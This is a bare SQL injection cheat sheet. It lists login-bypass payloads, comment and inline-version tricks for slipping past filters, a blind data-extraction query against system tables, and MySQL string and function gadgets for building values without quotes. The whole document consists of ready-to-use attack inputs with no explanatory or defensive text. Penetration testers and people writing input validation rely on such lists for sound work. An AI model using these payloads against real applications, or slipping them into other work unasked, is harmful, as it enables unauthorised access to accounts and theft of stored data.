SQLi Cheatsheet

admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
' or '1=1
admin' or'1=1
' or 1=1 or ''='
'or'a'='a
'or 1=1;#
user: admin' or 1=1-- pass: ' or 1=1--
' /*!50000or*/1='1
' /*!or*/1='1
1 OR 1=1
1' OR '1'='1
1'1
1' AND 1=(SELECT COUNT(*) FROM tablenames); --
1 AND USER_NAME() = 'dbo'
\'; DESC users; --
' OR username IS NOT NULL OR username = '
1 UNI/**/ON SELECT ALL FROM WHERE
1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116

SQLi filter (function based)

General function filtering
ascii (97)
load_file/*foo*/(0x616263)

String functions
'abc' = unhex(616263)
'abc' = char(97,98,99)
ord('a') = 97
'ABC' = concat(conv(10,10,36),conv(11,10,36),conv(12,10,36))
hex('a') = 61
ascii('a') = 97

Strings extracted from gadgets
collation(\N) // binary
collation(user()) // utf8_general_ci
@@time_format // %H:%i:%s
@@binlog_format // MIXED
monthname(from_days(690)) // November
monthname(from_unixtime(1)) // January
@@version_comment // MySQL Community Server (GPL)
dayname(from_days(401)) // Monday
dayname(from_days(403)) // Wednesday
collation(convert((1)using/**/koi8r)) // koi8r_general_ci
(select(collation_name)from(information_schema.collations)where(id)=2)
